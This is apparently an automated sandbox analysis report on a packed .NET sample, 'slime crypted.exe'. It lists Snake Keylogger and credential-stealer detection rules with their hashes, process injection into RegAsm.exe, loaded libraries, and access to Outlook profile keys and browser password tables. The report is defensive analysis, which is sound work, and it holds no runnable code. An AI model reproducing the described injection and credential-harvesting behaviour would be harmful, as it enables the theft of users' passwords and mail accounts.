Source: Process Memory Space: RegAsm.exe PID: 4220, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_0109E0C4	0_2_0109E0C4
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_053D0130	0_2_053D0130
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_053D0120	0_2_053D0120
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07164658	0_2_07164658
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07161298	0_2_07161298
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07167FB8	0_2_07167FB8
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07161E18	0_2_07161E18
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07165E00	0_2_07165E00
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_0716AE80	0_2_0716AE80
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_0716BB90	0_2_0716BB90
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_0717DCC8	0_2_0717DCC8
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07174BB8	0_2_07174BB8
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07177C58	0_2_07177C58
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07177C48	0_2_07177C48
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_071774C8	0_2_071774C8
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07200AC0	0_2_07200AC0
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07277F18	0_2_07277F18
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_0727B4C9	0_2_0727B4C9
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07279330	0_2_07279330
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07279322	0_2_07279322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0142C168	3_2_0142C168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_014219B8	3_2_014219B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0142CA58	3_2_0142CA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_01424F08	3_2_01424F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_01427E68	3_2_01427E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0142B9E0	3_2_0142B9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_01422DD1	3_2_01422DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_01427E59	3_2_01427E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_01424EF8	3_2_01424EF8

Source: slime crypted.exe, 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHelpWindow.exe( vs slime crypted.exe
Source: slime crypted.exe, 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs slime crypted.exe
Source: slime crypted.exe, 00000000.00000002.2048959964.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePoses.dll, vs slime crypted.exe
Source: slime crypted.exe, 00000000.00000002.2048959964.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs slime crypted.exe
Source: slime crypted.exe, 00000000.00000000.2036881319.0000000000A02000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWindowsFixer.exe: vs slime crypted.exe
Source: slime crypted.exe, 00000000.00000002.2048959964.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePoses.dll, vs slime crypted.exe
Source: slime crypted.exe, 00000000.00000002.2047546074.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs slime crypted.exe
Source: slime crypted.exe	Binary or memory string: OriginalFilenameWindowsFixer.exe: vs slime crypted.exe

Source: slime crypted.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.slime crypted.exe.3e8e680.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.slime crypted.exe.3e8e680.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.slime crypted.exe.3e8e680.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.slime crypted.exe.3e8e680.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.slime crypted.exe.3e1e7e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.slime crypted.exe.3e1e7e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.slime crypted.exe.3e4ae10.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.slime crypted.exe.3e4ae10.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: slime crypted.exe PID: 6600, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegAsm.exe PID: 4220, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: slime crypted.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3

Source: C:\Users\user\Desktop\slime crypted.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\slime crypted.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Mutant created: NULL

Source: slime crypted.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: slime crypted.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\slime crypted.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.4504752369.0000000003033000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.000000000303F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.0000000003010000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.0000000003001000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.000000000301F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4505642285.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: slime crypted.exe	Virustotal: Detection: 41%
Source: slime crypted.exe	ReversingLabs: Detection: 54%

Source: unknown	Process created: C:\Users\user\Desktop\slime crypted.exe "C:\Users\user\Desktop\slime crypted.exe"
Source: C:\Users\user\Desktop\slime crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\slime crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\slime crypted.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\slime crypted.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: slime crypted.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: slime crypted.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Source: slime crypted.exe

Static PE information: 0xC55D6CB5 [Wed Dec 5 11:17:09 2074 UTC]

Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_0716E090 push es; ret	0_2_0716E0A0
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07176F21 push es; ret	0_2_07176F30
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_071747BF push dword ptr [esp+ecx*2-75h]; ret	0_2_071747C3
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_072014B8 pushad ; iretd	0_2_072014D1
Source: C:\Users\user\Desktop\slime crypted.exe	Code function: 0_2_07274D20 push eax; iretd	0_2_07274D21

Source: slime crypted.exe

Static PE information: section name: .text entropy: 7.827723953918615

Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\slime crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
